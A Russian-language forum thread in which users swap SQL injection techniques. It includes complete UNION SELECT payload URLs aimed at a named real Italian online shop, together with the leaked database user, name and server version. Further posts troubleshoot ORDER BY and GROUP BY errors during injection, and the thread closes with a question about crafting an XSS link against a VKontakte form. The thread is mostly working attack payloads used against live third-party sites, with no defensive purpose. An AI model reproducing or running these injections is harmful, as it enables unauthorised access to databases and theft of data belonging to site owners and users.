проблемы с кодировкой используй конструкцию aes_decrypt(aes_encrypt())

/add jokester опередил с примером '(

Неа. Это не помогает. почему-то.

отлично помогает
http://www.originalstore.it/index.php?page=viewprod&id=-1+UNION+SELECT+1,2,UNHEX(HEX(concat_ws(0x3a,User() ,Database(),Version()))),4,5,6,7,8.9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36/*

administrator@localhost:gestione:4.1.11-Debian_4sarge7-log

И это тоже разумеется :
http://www.originalstore.it/index.php?page=viewprod&id=-1+UNION+SELECT+1,2,aes_decrypt(aes_encrypt(concat_ ws(0x3a,User(),Database(),Version()),1),1),4,5,6,7 ,8.9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36/*

Я осознал.
Спасибо

При исполнении следующих запросов :

page.php?id=-1'+order+by+3/* :

Unknown column '3' in 'order clause' (Казалось бы все нормально, НО!)

page.php?id=-1'+order+by+2/*

Выдает :

Mixing of GROUP columns (MIN(),MAX(),COUNT(),...) with no GROUP columns is illegal if there is no GROUP BY clause

Что это означает? И как это победить?

так мож тут 2 колонки.
попробуй терь page.php?id=-1'+union+select+1,2/*

Там и есть 2 колноки, но при запросе page.php?id=-1'+union+select+1,2/* :

Mixing of GROUP columns (MIN(),MAX(),COUNT(),...) with no GROUP columns is illegal if there is no GROUP BY clause

нужно указать группировку по полю (у вас конец запроса обрывается комментариями), т.е.
ляляля + group by поле/*

Я не уверен в том что это серьезный баг, вконтакте если зайти в свой аккаунт, раздел "мои группы" - справа вверху форма "фильтр групп".
В этой форме выполняется
Код формы

Собственно вопрос такой: можно ли сформировать ссылку XSS?